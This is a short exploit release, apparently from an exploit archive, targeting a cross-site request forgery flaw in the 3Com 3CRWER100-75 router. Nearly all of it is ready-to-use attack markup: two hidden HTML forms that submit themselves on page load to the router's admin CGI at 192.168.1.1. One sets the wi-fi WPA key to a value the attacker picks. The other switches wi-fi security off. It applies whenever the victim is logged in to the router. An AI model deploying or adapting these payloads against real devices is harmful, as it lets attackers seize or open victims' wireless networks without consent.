########################################################## # Exploit Name : CSRF - 3Com rooter - 3CRWER100-75 # # Author : gabry9191 # # Website : http://gabry9191.altervista.org/ # # E-Mail : info-gabry9191@autistici.org # ############################################################## # # # This exploit work only if the user is logged to the rooter # # # ############################################################## # Change wi-fi password # ######################### <form name="tF" method="post" action="http://192.168.1.1/cgi-bin/wireless_wpa.exe"> <input type="hidden" value="document.location.href='wireless_wpa_psk.stm';" name="nextPage"></input> <input type="hidden" value="Location: /wireless_wpa_psk.stm" name="nextPage2"></input> <input name="changewep" value="0"> <input name="wpa_en" value="1"> <input name="wpa_authen" value="1"> <input name="w802_rekey" value="2"> <input name="wsec_mode" value="2"> <input name="wpa_mode" value="2"> <input name="Cypher_suite" value="2"> <input name="wpa_psk" value="0"> <input name="sharedkey" value="[PASSWORD-WI-FI]"> <input name="sharedkey1" value="[PASSWORD-WI-FI]"> <input name="obscurePSK" value="1"> </form> <script>document.body.onload = document.forms[0].submit();</script> ########################## # Disable wi-fi password # ########################## <form name="tF" method="post" action="http://192.168.1.1/cgi-bin/wireless_wpa.exe"> <input name="changewep" value="0"> <input name="wsec_mode" value="1"> </form> <script>document.body.onload = document.forms[0].submit();</script>